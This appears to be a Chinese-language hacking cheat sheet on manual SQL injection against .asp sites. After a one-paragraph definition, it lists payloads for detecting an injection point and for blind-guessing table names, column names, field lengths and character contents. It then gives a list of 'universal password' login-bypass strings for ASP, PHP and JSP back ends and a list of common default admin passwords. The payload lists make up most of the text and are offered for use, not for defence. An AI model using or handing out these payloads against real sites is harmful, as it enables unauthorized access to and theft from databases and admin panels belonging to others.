SQL手工注入原理:
下面就是比较笨的方法了== 一个一个试 (* ̄rǒ ̄)
针对于.asp后缀网 + ?id_ 在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点
一、什么是SQL注入
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
二、判定是否存在注入点
and 1=1 and 1=2
三、猜解数据库表名
and 0<>(select count(*) from 表名)
四、猜解数据库列名
and (select count(列名) from 猜到的表名)>0
五、猜解字段长度
and (select top 1 len(猜到的列名) from 猜到的表名)>0
六、猜解字符内容
and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')
万能密码及默认密码登陆后台:
一、万能密码原理
万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。
例如后台系统验证密码要求用户输入的密码和数据库里面的匹配,而用万能密码的方式,就是将验证的语句改成了验证成功的,逻辑运算符AND和OR的运算优先次序是:先运算AND运算符在运算OR运算符,这个漏洞是发生在登陆口,只有登陆口才会出现这样的漏洞。
二、万能密码大全
ASP 万能密码
1:"or "a"="a
2:')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13:'OR 1=1%00
14:"or 1=1%00
15:'xor
16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1
17: admin' or 'a'='a 密码随便
PHP 万能密码
1:'or 1=1/*
2:User: something
Pass: ' or '1'='1
JSP 万能密码:
1:1'or'1'='1:
2:admin' or 1=1/*
默认密码:
1:admin
2:admin888
3:123456
4:123123
5:(域名)